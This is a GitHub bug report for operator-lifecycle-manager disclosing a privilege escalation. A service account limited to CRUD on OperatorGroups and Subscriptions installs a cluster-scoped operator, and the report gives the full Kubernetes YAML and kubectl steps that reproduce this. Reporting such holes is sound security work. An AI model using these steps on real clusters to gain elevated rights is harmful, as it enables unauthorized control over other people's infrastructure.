### ISSUE TITLE
Users can escalate privileges using Subscriptions

### ISSUE THREAD

**Issue by chenzhiwei** [operator-framework/operator-lifecycle-manager#1824]
## Bug Report

A user with CRUD permission on OperatorGroup/Subscription can escalate the cluster-admin permission, and then destroy the cluster if he want.

### What did you do?

1. Create a namespace, service account and grant CRUD operatorgroup/subscription permissions to this service account

```
apiVersion: v1
kind: Namespace
metadata:
  name: test-ns

---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: debug
  namespace: test-ns

---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: ns-admin
  namespace: test-ns
rules:
- apiGroups:
  - operators.coreos.com
  resources:
  - operatorgroups
  - subscriptions
  verbs:
  - '*'

---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: ns-admin
  namespace: test-ns
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: ns-admin
subjects:
- kind: ServiceAccount
  name: debug
```

2. Create a pod with the above service account

    We can see that the service account has no get pod permission, it actually only has CRUD on OperatorGroup and Subscription.

```
# kubectl -n test-ns run --generator=run-pod/v1 -it --rm --image=siji/kubectl --serviceaccount=debug debug
If you don't see a command prompt, try pressing enter.
bash-5.0# kubectl get pod
Error from server (Forbidden): pods is forbidden: User "system:serviceaccount:test-ns:debug" cannot list resource "pods" in API group "" in the namespace "test-ns"
```

3. Use the service account to install a cluster scoped operator

```
apiVersion: operators.coreos.com/v1
kind: OperatorGroup
metadata:
  name: test-og
spec:
  targetNamespaces:
  - test-ns

---
apiVersion: operators.coreos.com/v1alpha1
kind: Subscription
metadata:
  name: jenkins
spec:
  channel: alpha
  installPlanApproval: Automatic
  name: jenkins-operator
  source: community-operators
  sourceNamespace: openshift-marketplace
```

4. The cluster scoped operator can be installed successfully

    I think this is a very serious privilege escalation issue.

### What did you expect to see?

The user can't escalate any permissions.

### Environment
* operator-lifecycle-manager version:

4.5.13 / 0.15.1

* Kubernetes version information:

Client Version: 4.4.6
Server Version: 4.5.13
Kubernetes Version: v1.18.3+47c0e71

Client Version: version.Info{Major:"1", Minor:"17", GitVersion:"v1.17.0-4-g38212b5", GitCommit:"4a4cd759b616cdba344dd73386727c10d3d2dde1", GitTreeState:"clean", BuildDate:"2020-05-25T22:39:54Z", GoVersion:"go1.13.4", Compiler:"gc", Platform:"linux/amd64"}
Server Version: version.Info{Major:"1", Minor:"18+", GitVersion:"v1.18.3+47c0e71", GitCommit:"47c0e71", GitTreeState:"clean", BuildDate:"2020-09-17T23:10:07Z", GoVersion:"go1.13.4", Compiler:"gc", Platform:"linux/amd64"}

* Kubernetes cluster kind: 

**Possible Solution**

**Additional context**
